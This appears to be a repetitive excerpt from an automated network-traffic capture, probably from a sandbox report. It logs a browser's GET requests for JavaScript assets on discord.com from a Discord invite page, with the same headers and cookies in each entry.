Source: global trafficHTTP traffic detected: GET /assets/47146.57a6c7b40e47673fbb30.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/98086.6b10664a8a1ecdf8a01d.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/21413.04451f046a440f45bd24.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/75676.8481ee3ef6c0d7c670c6.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/64873.bd98aa3f1ec96684dac4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/35306.b8cb1ccc1b838a7a51bf.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=IGkoRJb4o0fBRA2A_Uv5li3l03vfUsUAueFIOe5l2mw-1702226714083-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/74970.ad098636400bd7dcbe6c.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=IGkoRJb4o0fBRA2A_Uv5li3l03vfUsUAueFIOe5l2mw-1702226714083-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/74836.b991877dde75f9619c99.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RQw1E92zHcYypAlNKKaEjaykckixx3wEoabyF8zqQA4-1702226714221-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/94491.e9bbfb32dd44ea7e36a4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=3m3ImPeY0T8aAVoYwXFpa98cqKmeu.MX8m5GuOxD1wA-1702226714542-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/94816.5a175ba33d20e66d2eca.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6SN5FnduB0Lo2zfvOqmF58x6ckQbV5TI8RXJ1hgY_SI-1702226714570-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/60499.862663374dc7b2606eb6.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6SN5FnduB0Lo2zfvOqmF58x6ckQbV5TI8RXJ1hgY_SI-1702226714570-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/37102.04489c88475d6b93636f.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6SN5FnduB0Lo2zfvOqmF58x6ckQbV5TI8RXJ1hgY_SI-1702226714570-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/79417.40e5966eb87d1ff2ee44.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=oo4YIdE2.wdmW_Lsz5xAszQC_FAbHygMJLTXIumxORw-1702226714823-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/49191.d845556dff27841ecd1e.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Z.MTrWXYna45fXtGvhRBk.Y5ys9ax0.AcL1Lr.Qg04Y-1702226714835-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/26230.a8a95f983d9bf704aebc.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Z.MTrWXYna45fXtGvhRBk.Y5ys9ax0.AcL1Lr.Qg04Y-1702226714835-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/17744.a586cfff7253ad1f7ffe.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=A_tEuyVy8iqHdI02DBjD2_Kf.MIluBkk8K9XlyGqVu8-1702226715211-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/22198.60494a9d4db5b29906c5.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=A_tEuyVy8iqHdI02DBjD2_Kf.MIluBkk8K9XlyGqVu8-1702226715211-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/59310.e3191416559a74901ac0.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R6EnoBbk51Lpo3KvRRQdoVV8WVsvBs.YF3SveDapLaU-1702226715353-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/56145.ca77ff8c50f941ccf356.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=vJps2MJak7qXWd7GhqlJPSUfdodRQBf0okz7bFIiceQ-1702226715413-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/58247.6146ce4a4e300aea8b79.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NJDkhq7B.ZSGc6Fu1xeHwfw3lX8us_kYwGihA6TD490-1702226715443-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/62768.232f00c591becc89b0ca.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NJDkhq7B.ZSGc6Fu1xeHwfw3lX8us_kYwGihA6TD490-1702226715443-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/80083.8581aa78cb83cb4217b0.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iRAiSvtbgHcnTcXmML0TZwPw6wexfCw0vSHWhERq4ZI-1702226715799-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/7105.da032cdf2d68f70cd9db.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iRAiSvtbgHcnTcXmML0TZwPw6wexfCw0vSHWhERq4ZI-1702226715799-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/23398.99046fdebb0d52a5294c.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/66888.e207ac8a6f2c14a9eaa9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/77015.bb8daebc6abe745c8fdd.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/97146.ba5d381e14f798be8b84.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/82082.66eccead8076cc2a44a4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; 